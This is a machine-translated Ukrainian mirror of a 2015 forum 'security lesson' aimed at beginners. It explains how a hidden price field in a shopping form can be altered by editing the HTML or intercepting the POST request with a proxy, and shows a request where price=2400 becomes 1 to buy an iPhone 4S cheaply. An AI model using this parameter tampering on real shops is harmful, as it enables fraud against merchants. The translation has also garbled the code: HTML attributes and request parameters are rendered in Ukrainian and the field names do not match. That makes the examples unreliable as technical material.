Ця стаття є дзеркальною статтею машинного перекладу, будь ласка, натисніть тут, щоб перейти до оригінальної статті.

Вид: 12586|Відповідь: 0

[Урок з безпеки] Проникнення вторгнення: застосування HTTP-заголовків

[Копіювати посилання]
Опубліковано 07.02.2015 17:59:07 | | |

Про застосування HTTP-заголовків

Заголовок HTTP часто використовується у механізмі передачі вебсайтів, але більшість початківців у Китаї не помітили цю деталь, ця стаття присвячена лише початківцям, ролі HTTP-заголовка у процесі вторгнення.

Візьмемо сторінку покупок як приклад, щоб проаналізувати невелику роль HTTP-заголовків.

Спершу проаналізуємо форму на сторінці покупок.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<тип введення="приховане" ім'я="ціна" значення="449">

<тип введення="відправити" значення="Купити">

</form>

Під час відкриття зробіть скріншот його заголовка http-повідомлення і подивіться на нього

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Хоча поле ціни не відображається на сторінці при відкритті сторінки покупок, користувач все одно може редагувати та керувати ним.

Існує два способи досягти редагування

1. Збережіть вихідний код HTML для модифікації, а потім завантажте його в браузер для запуску

2. Використання проксі-перехоплення для зміни HTTP-заголовків (конструювання проксі в інструментальному відрижку)

Візьмемо HTTP-заголовок вище як приклад
До змін
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Після зміни
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

кількість=1&ціна=1


У останньому рядку поле Price має значення 2400, і якщо ми змінимо її на 1, ми можемо отримати iPhone 4S за нижчою ціною.

Ця стаття дає лише уявлення про несподівані результати, такі як ін'єкція LDAP.




Попередній:Метод реалізації MySQL Password Recovery Recovery Method Implementation
Наступний:SQL-ін'єкція для отримання повного шляху вебсайту
Застереження:
Усе програмне забезпечення, програмні матеріали або статті, опубліковані Code Farmer Network, призначені лише для навчання та досліджень; Вищезазначений контент не повинен використовуватися в комерційних чи незаконних цілях, інакше користувачі несуть усі наслідки. Інформація на цьому сайті надходить з Інтернету, і спори щодо авторських прав не мають до цього сайту. Ви повинні повністю видалити вищезазначений контент зі свого комп'ютера протягом 24 годин після завантаження. Якщо вам подобається програма, будь ласка, підтримуйте справжнє програмне забезпечення, купуйте реєстрацію та отримайте кращі справжні послуги. Якщо є будь-яке порушення, будь ласка, зв'яжіться з нами електронною поштою.

Mail To:help@itsvse.com